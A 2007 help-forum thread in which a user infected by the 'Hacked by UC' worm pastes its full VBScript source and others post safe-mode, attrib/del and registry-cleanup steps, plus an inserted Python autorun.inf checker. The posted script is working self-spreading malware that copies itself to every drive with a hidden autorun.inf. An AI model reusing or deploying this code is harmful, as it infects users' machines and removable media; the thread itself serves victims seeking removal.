C++/VB - Hacked by UC???

Asked By SF
21-Mar-07 04:01 AM
Hi,

I recently visited an internet shop, downloaded some files, and plugged my flash
drive in to copy those downloaded files. At home, I plugged the flash drive into
my PC and transferred the files. When I started my Windows XP the next day, I
could not double-click on the C: drive; it did not work (did not open). I got a
brief display of the hourglass. When I opened a web page, I saw at the top a
message displaying "Hacked by UC".

I found the script below that causes the above problem. Is this a sign of
hacking, and how do I set it back to my previous Windows setting?


'My name is Slow but sure V0.05
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe uc.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "\uc.vbs")
tf.attributes = 32
set tf=fs.createtextfile(winpath & "\uc.vbs",2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & "\uc.vbs")
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and
flashdrive.path <> "A:" then
set tf=fs.getfile(flashdrive.path &"\uc.vbs")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"\uc.vbs",2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &"\uc.vbs")
tf.attributes =39
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes=39
end if
next
set rg = createobject("WScript.Shell")
rg.regwrite
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\Main\Window Title","Hacked by UC"
rg.regwrite "HKCR\vbsfile\DefaultIcon","shell32.dll,2"
if check <> 1 then
Wscript.sleep 200000
end if
loop while check<>1
set sd = createobject("Wscript.shell")
sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname
  Paulaner replied...
21-Mar-07 07:00 AM
The first thing I would do is go into regedit and delete this key:

Then delete this one:
Title"

Then delete uc.vbs from your windows folder and your flash drive.
  scott replied...
30-Mar-07 06:11 PM
It keeps copying itself. It's also in your startup and your shell, so upon double-clicking C: it will copy itself once more. I've tried deleting it off the flash drive and the C drive, even using command prompts; I've tried deleting registry keys and restarting in command prompt. I will try to restart in safe mode now.
  Done replied...
31-Mar-07 12:37 AM
Boot in safe mode, Remove (from) C:\autorun.inf, delete Registry\Software\Windows\CurrentVersion\Run\uc key, delete HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title key. Reboot.
  Ai Chung Chong replied...
31-Mar-07 02:24 PM
To completely remove it from your computer, restart the computer in Safe Mode (do not try to access any drive using Windows Explorer before you complete the following steps):

- Go to Task Manager (press Ctrl+Alt+Del) and make sure there is no process with Image Name = "wscript.exe". End the process if it is running.

- Go to the command prompt and type the following command:

del %systemroot%\uc.vbs

For each of the drives available on the computer, type the following commands in the command prompt (replace <drive_name> with the drive letter):

attrib -h -s -r <drive_name>:\autorun.inf

attrib -h -s -r <drive_name>:\uc.vbs

del <drive_name>:\autorun.inf

del <drive_name>:\uc.vbs

- Remove the following registry keys:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\UC

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title

HKCR\vbsfile\DefaultIcon





To save yourself from a similar incident again, you might want to take note of the following points:

- Try to use only an account without admin privileges to log on to your computer, and use runas to execute tasks that require administrator privileges.

- Disable autorun on your computer (this will result in audio/video not playing automatically when you insert a CD/DVD/removable drive). You can refer to the following article for how to disable autorun: http://www.annoyances.org/exec/show/article03-018.
  julia replied...
02-Apr-07 02:02 PM
I tried the above-mentioned techniques for deleting this virus, and kept coming up with "file not found" when I typed commands into the command prompt. Any suggestions?
  Paul Hatch replied...
15-Oct-07 04:39 PM
Hi Julia,

I just wanted to let you know that I figured out a solution that worked for me; that is to get double-click access to my drives and get rid of 'Hacked by UC' in the IE title bar. Anyway, here are the steps I followed that got the problem fixed on my computer. However, these instructions are kind of long, so it might take awhile to get through all the steps.



One last thing before I get into the instructions to fix the problem: You might want to save this page to your hard drive, to your My Documents folder. The reason I say this is that if you have the page saved to your hard drive you will be able to view it while you are in safe-mode. Also, if you have a word processing program, such as Microsoft Word, you can copy this post and paste it into a document (and save to the My Documents folder) and that should make it a bit easier to locate this post, than if you use your web browser and open the webpage, although you can do either. (Just anything to view these instructions in safe-mode - they're quite lengthy.) Well, I hope my instructions help you get that nasty problem fixed - I wish you luck!

---------------------------------------------------



If you see ‘Hacked by UC’ in the title bar of Internet Explorer, you may have noticed that you cannot open the drives in Windows Explorer by double-clicking on the drives.



If you are experiencing this problem, and you need immediate access to a drive, you can safely open it by right-clicking on the drive you want to open, and then click Open.



The reason I say ‘safely’ is that if you double-click a drive to open it, and it doesn’t open, it runs a script in the root of that drive called ‘uc.vbs’, which is referenced in the autorun.inf file.



Now, let’s proceed to fix the problem:

(Note: Press Enter after each line, and do not type the punctuation)



1.	Restart the computer and go into safe-mode.

2.	Press Ctrl+Alt+Del to bring up the Windows Task Manager.

3.	Click the Processes tab. Look for a process called wscript.exe, and terminate it if it’s running. There may be more than one instance of this process so be sure you terminate all of them if there’s more than one.

4.	Now you need to show the hidden files and folders, if they’re not already shown.



To do this follow these steps:

•	Open My Computer

•	Go Tools | Folder Options and click the View tab

•	Click the radio button Show Hidden Files and Folders

•	Scroll down if necessary and find the check box Hide Protected Operating System Files, and if you see a check mark remove it



5.	Open the Command Prompt

6.	Type ‘del %systemroot%\uc.vbs’. Don’t worry if you get a ‘File not found’ error

7.	Go to the root of the C drive and type ‘attrib -r -h -s C:\uc.vbs’

8.	Type del uc.vbs.

9.	Type attrib -r -h -s C:\autorun.inf

10.	Type del autorun.inf



Repeat steps 6 through 9 for all hard drives or hard drive partitions that you’re having trouble with, and replace C with the appropriate drive letter, and remember to press Enter after every line.



Now, go to the Start menu, click Run, type ‘regedit’ and then click OK.



This takes you into the Registry Editor. What you’re going to do here is remove the following values from the registry:





HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\UC



HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title

HKCR\vbsfile\DefaultIcon






When you’re finished deleting the above registry values navigate to the top of the registry, and then go Edit | Find, and then type ‘uc.vbs’. When you’re finished click Find Now.



Furthermore, don’t delete the string value itself – Here’s what I recommend: open the string value (which is in the right pane) and then delete everything in it, and then click OK. Press F3 when you’re ready to go to the next occurrence.



Keep doing this until you have emptied all the string values containing references to ‘uc.vbs’. When you have finished going through the whole registry, you’ll want to be sure you haven’t missed any occurrences.



Navigate back to the top of the registry and click on My Computer to highlight it. You want to be sure you’re searching the whole registry.



Now go to the Edit menu and click Find. In the text box make sure you see uc.vbs, and then click Find Next. What we’re doing is a sweep of the entire registry to make sure we have deleted every reference to uc.vbs. I’m not certain that it’s safe to delete the string value itself because I haven’t tested it, so we’re staying on the safe side.



If you come across any string value with this filename, open it, delete the contents of the string value. You can do this quickly by placing the insertion point at the beginning of the text field and then pressing Shift+End. This selects everything in the string value. Press Delete, then click OK. After you have done this press F3 to see if there are any more of these references.



After you have come to the end of the registry, navigate back to the top of the registry and then do another search. What you’re after is to go through the whole registry without finding any occurrences of uc.vbs.



When you’re finished, restart the computer.



After you’ve restarted the computer open Windows Explorer (My Computer) and then double-click on the icon for your hard drive. You should now be in your hard drive’s directory.



Well, you’re all finished! That was quite a journey, but if you did everything correctly I believe that you will again have double-click access to your drives as well as be rid of ‘Hacked by UC’ in the IE title bar.
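Added example (not part of any poster's reply): a small Python triage helper for the autorun.inf mechanism described in this thread. It lists the launch entries in an autorun.inf, flags those that start a script host or script file, and decodes the attribute value 39 that the posted script sets on its files, which is why the replies run attrib -r -h -s before del. Function names and sample strings are constructed for illustration.

```python
import re

# Keys in the [autorun] section that make Explorer launch a program.
LAUNCH_KEYS = re.compile(r"^(open|shellexecute|shell\\[^\\=]+\\command)$", re.I)
# Script hosts / script extensions that should not appear in a data drive's autorun.
SCRIPT_HINT = re.compile(
    r"\b(wscript|cscript|cmd|mshta)(\.exe)?\b|\.(vbs|vbe|js|jse|wsf|bat|cmd)\b",
    re.I,
)
# File attribute bits as used by Scripting.FileSystemObject and attrib.
ATTR_BITS = {1: "read-only", 2: "hidden", 4: "system", 32: "archive"}


def launch_commands(inf_text):
    """Return (key, command) pairs from the [autorun] section of autorun.inf text."""
    found, in_section = [], False
    for raw in inf_text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("["):
            in_section = line.lower() == "[autorun]"
            continue
        if in_section and "=" in line:
            key, _, value = line.partition("=")
            if LAUNCH_KEYS.match(key.strip()):
                found.append((key.strip().lower(), value.strip()))
    return found


def suspicious(inf_text):
    """Launch commands that start a script host or a script file."""
    return [(k, v) for k, v in launch_commands(inf_text) if SCRIPT_HINT.search(v)]


def decode_attributes(value):
    """Names of the attribute bits set in a FileSystemObject attributes value."""
    return [name for bit, name in ATTR_BITS.items() if value & bit]


# Constructed samples: the first is the autorun.inf body the posted script writes,
# the second is a benign installer-disc style file.
WORM_INF = "[autorun]\r\nshellexecute=wscript.exe uc.vbs"
BENIGN_INF = "[autorun]\nicon=setup.ico\nlabel=Install Disc\nopen=setup.exe\n"

if __name__ == "__main__":
    print("flagged:", suspicious(WORM_INF))
    print("benign :", suspicious(BENIGN_INF))
    print("attributes 39 =", decode_attributes(39))
```

To check a real drive, read its autorun.inf as text and pass the contents to suspicious(); files carrying the hidden and system bits are not listed by a plain dir, so look for them with attrib first.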
  Trevor Roodt replied to Paul Hatch
07-Oct-10 09:41 AM
Hi all



I hope someone can help me please. I am having a similar problem; however, it states Hacked by (my computer name) in the IE title bar. I have gone through these steps and have not been able to find a solution to this.



Many thanks



Trevor